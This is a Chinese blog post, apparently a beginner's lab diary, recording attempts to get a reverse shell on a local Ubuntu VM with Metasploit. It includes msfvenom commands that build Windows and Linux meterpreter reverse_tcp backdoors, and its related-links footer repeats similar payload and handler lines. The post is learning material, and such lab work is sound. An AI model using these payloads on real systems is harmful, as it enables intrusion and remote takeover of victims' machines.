利用Metasploit获取linux反弹shell的尝试

最新推荐文章于 2024-05-20 08:35:07 发布
最新推荐文章于 2024-05-20 08:35:07 发布
阅读量9.6k 收藏 11
点赞数 1
分类专栏: HACK
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42324313/article/details/99712495
版权

接《Metasploit上使用RPC方式复现一个Linux提权漏洞》。
由于刚刚入手,对很多概念和技术不慎了解,对RPC,mfsd,反弹shell等技术的理解有限,甚至有所偏差,导致前面做的探索差强人意。虽然最后建立了攻击机与靶机之间的连接,并且拿到shell和root权限,但是不能算是真正意义上的Metasploit上使用RPC方式复现一个Linux提权漏洞。
还需要继续进行探索,具体什么时候能够成功,我也不清楚,可能这次,也可能下次。本博客仅为了记录我的实验思路和进度,当探索有所突破时我将对所有的工作进行整理。
接下来采纳学长的建议,先不考虑RPC

Metasploit入门

快速刷了一遍安全牛的Metasploit课程,对Metasploit有了进一步的理解,具体的基础操作不在本文展开,以后对Metasploit集中学习时会详细记录。今天只讨论一些对探索有所帮助,或者有助于使用Metasploit框架的收获。

  1. Exploit模块
    expolit可以理解为方法,即攻击的步骤,像是菜谱一样,什么时候该做什么,大大提高了渗透效率。
  2. Payload模块
    payload即攻击载荷,是攻击时真正起作用的代码,通常被传输到靶机的特定内存地址,通过调用达到指定的目的。
  3. 反弹shell
    Metasploit中提供了一些可以直接获得反弹shell的exploit或payload,例如exploit/windows/shell/reverse_tcp,linux/shell/reverse_tcp等

存在的问题:
1.视频教程上的例子大部分都是windows系统的,而且直接给出使用的exploit或payload,但是为什么要用这个,什么时候用这个都没有提。
2.当我需要完成某项功能时,不知道用哪个exploit或payload,网上似乎没有这方面的解释
3.正如2中所说,网上关于Metasploit的解释和常见问题是在是太少了
4.有些漏洞要求对应的版本,那些已经淘汰的版本找起来如大海捞针

初次尝试

参考:https://www.bbsmax.com/A/gAJG9w38dZ/

实验环境

  • 攻击机:
    4.19.0-kali linux-amd64
    ip:192.168.1.108
  • 靶机:ip:192.168.1.112
    在这里插入图片描述
  • samba服务:4.3.11-Ubuntu

kali

  1. 打开msfconsole
    在这里插入图片描述
  2. search cve-2017-7494(根据参考中的网址下载,并更名为cve-2017-7494)
    在这里插入图片描述3.use exploit/linux/smb/cve_2017_7494
    在这里插入图片描述4.用set命令设置参数
    在这里插入图片描述5. run
    在这里插入图片描述

这就很崩溃了,参数设置都没问题,结果就是连不上。两个系统的防火墙都已经关闭了,难道是版本的问题吗?Ubuntu的samba服务是4.3.11,应该是具有这个漏洞的。不明白为什么会这样,网上也没啥有用的文章。
接下了考虑还一个exploit,还得一个一个找
由于可能不成功,不会写详细的步骤了,会大致写出用到的exploit和payload

n次尝试

  1. exploit/linux/redis/redis_unauth_exec + linux/x64/shell/reverse_tcp
    报错:This exploit may require manual cleanup of ‘./crkho.so’ on the target

做到这学长给予了我帮助,让我参考https:xz.aliyun.com/t/2380这篇文章,比我之前在百度上搜到的要优质的多。

新方法(失败)

  1. msfvenom + linux/x64/shell/reverse_tcp 生成可执行文件 iambad
    在这里插入图片描述

  2. scp 传至 目标linux
    在这里插入图片描述
    解决方法:搜索了一下,原来是没有该目录的操作权限,默认的是在/tmp目录有权限
    在这里插入图片描述

  3. 参数设置好并run
    在这里插入图片描述4. 在靶机上运行iambad

又失败了,尴尬。。。。

换一种环境(成功)

为了便于理解,我决定将靶机换成windows系统,尝试能否连接成功,然后再换成linux。
经历几次失败和查询资料后成功连接

  1. 用 ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 -f exe -o payload.exe生成后门程序
    在这里插入图片描述
  2. 设法将生成的payload.exe拷贝到靶机中(可以利用vm tool工具)
  3. 打开msf,进行如下设置
    在这里插入图片描述
  4. 在靶机上运行payload.exe
    在这里插入图片描述
  5. 连接成功并建立一个sessions
    在这里插入图片描述

根据以上实验可知,这种方法是可行的,在linux系统下为什么失效呢?可能是因为生成的后门程序类型不对,导致无法运行,或功能失效

回归linux靶机(成功)

  1. 生成payload.elf
./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 -f elf > payload.elf

在这里插入图片描述

  1. scp 命令传送至linux

刚传过去的payload.elf需要修改权限:sudo chmod 777 payload.elf
在这里插入图片描述

  1. 打开msf并配置
    在这里插入图片描述
  2. run
    在这里插入图片描述
  3. 在靶机上运行payload.elf
    在这里插入图片描述
  4. 成功拿到反弹shell
    在这里插入图片描述

小结:知识是不断学习中得来的,成长是不断失败中获得的,经验是不断尝试中得到的。做成功之后又回去分析了一下失败的例子,对<新方法>中失败的原因有了新认识,生成iambad时用的payload模块选错了,应该用meterpreter的。还用就是注意生成后门程序时所用payload应与msf中set的payload保持一致。
做完想学习一下meterpreter,看了第一篇文章就炸毛了,早点看到这篇文章我就少走好多弯路
https://www.cnblogs.com/backlion/p/9484949.html

Fly-U
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit reverse Shell的免杀(炊少教学)
weiliang369的博客
02-25 323
rootkithat是我以前的马甲 以前写的文章 我们先生成一个X64的WINDOWS XP 的reverse SHELL 1 2 root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/ meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe 提示:你可以用 scheduleme -m 1 -u e /tm
Metasploit 生成***反弹shell
weixin_34372728的博客
04-27 2488
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报特点:这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的...
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 630
​MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
反弹shell提权linux,【我i原创】Metasploit反弹shell + 嗅探 + 域提权
weixin_42498641的博客
05-13 273
[size=13.3333px]sessions -i 1 //打开建立的第一个会话getuid //查看UIDsysinfo //查看攻击主机的系统信息run hashdump //dump目标主机的hash帐号信息,备份进行暴破ps //查看目标主机进程migrate 1576(pid) //切换自己为管理员,1576是管理员的进程IDgetuidkeyscan_start //开启健盘记录功...
使用Metasploit web_delivery 反弹shell
大方子
02-07 5359
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。 此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。 当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效
metasploit2 linux靶机反弹meterpreter shell
liweibin812的博客
07-07 707
Java RMI SERVER 命令执行漏洞 Java RMI Serve 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,可被利用导致代码执行。 1.在kali中执行msfconsole,启动metasploit 2.use exploit/multi/misc/java_rmi_server,选择漏洞 3.set RHOST 192.168.175.130 设置要攻击的机器IP 4.exploit,开始攻击 5.利用成功,得到 meterpreter shell注意:其他参数默认,不用.
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
Linux提权不能反弹Shell利用metasploit进行提权.txt
03-18
Linux提权不能反弹Shell利用metasploit进行提权.txt
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
06-24
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
53.Windows漏洞利用Metasploit实现栈溢出攻击及反弹shell1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
metasploit linux 提权.md
09-06
metasploit linux 提权.md
利用 metasploit 创建反弹 shell实验
m0_68638628的博客
07-01 198
metasploit是一款开源的安全漏洞检测工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,是世界上使用最多的渗透实用程序。Metaloit的设计初衷是打造成一个攻击工具开发平台,IT专业人士借助其识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 451
知识是不断从学习中得到的,经验是从尝试中得到的!
利用 metasploit 创建并反弹 shell
2301_78457119的博客
06-29 327
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。1 环境准备1.开启Kali虚拟机和bee-box靶机1.首先用 msfvenom 生成一个反弹 shell 的程序,将返回的连接地址修改为kali的 ip 地址。在 kali 中打开终端,输入:当我们在服务器。
Metasploit实验:android内网的反弹控制
wjwqp的专栏
04-11 478
一。测试环境: 实验环境:kali下Metasploit,kali无线网络环境1(外网180.91.xx.xx,内网:192.168.0.XX): 安卓手机:oppo R17.无线网络环境2(外网180.80.xx.xx,内网:192.168.1.XX): 思路:制作payload,攻击,映射端口 二、准备:一个ngrok帐号。 2.1没有可以去注册:htt...
How to use a reverse shell in Metasploit
公众号shadow sock7
05-25 527
参考: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit有两种流行的shell种类:bind和reverse。 bind shell就是在target上开启一个新的服务,需要attacker连接以得到一个session。 reverse shell(也被称为反
Metasploit 生成反弹连接木马
qq_26002283的博客
04-01 1319
“注 本文为笔者学习过程中记录” Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe 生成一个名为 test.exe 的木马文件到msf目录下 Step2: 通过 msfconsole 命令进入metasploit : Step3...
metasploit简单使用-生成木马反弹shell连接
一根火柴博客
01-30 2320
metasploit简单使用 在Kali中运行msfconsole,运行下列命令生成test.exe木马 use evasion/windows/windows_defender_exe set filename test.exe set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.11 set lport 5555 ex...
反弹shell提权linux,当Linux提权不能反弹Shell利用metasploit进行提权
weixin_42495394的博客
05-13 398
LINUX提权反弹不了时.经常遇到这种情况 请出MSF ..1 .生成WEBSHELL文件msf > msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R > dis9.php我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行把dis9.php传进你的SHELL里 例如 www.dis9.com/dis9.php2 . 然...
metasploit 反弹shell
10-16
Metasploit 是一款常用的渗透测试工具,可以用来测试网络安全。反弹 shellMetasploit 中的一个常用功能,可以通过它在目标机器上执行命令或者获取目标机器的控制权。具体操作步骤如下: 1. 打开 Metasploit 控制台,输入以下命令: ``` use exploit/multi/handler set PAYLOAD <payload> set LHOST <attacker IP> set LPORT <attacker port> run ``` 其中,`<payload>` 是要使用的 payload,常用的有 `windows/meterpreter/reverse_tcp`、`linux/x86/meterpreter/reverse_tcp` 等;`<attacker IP>` 是攻击者的 IP 地址;`<attacker port>` 是攻击者监听的端口号。 2. 在目标机器上执行以下命令: ``` msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> > shell.<format> ``` 其中,`<payload>`、`<attacker IP>`、`<attacker port>` 与上面的命令相同;`<format>` 是输出格式,常用的有 `exe`、`elf`、`asp` 等。 3. 将生成的 shell 文件上传到目标机器上,并执行以下命令: ``` ./shell.<format> ``` 4. 回到 Metasploit 控制台,可以看到已经成功反弹shell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值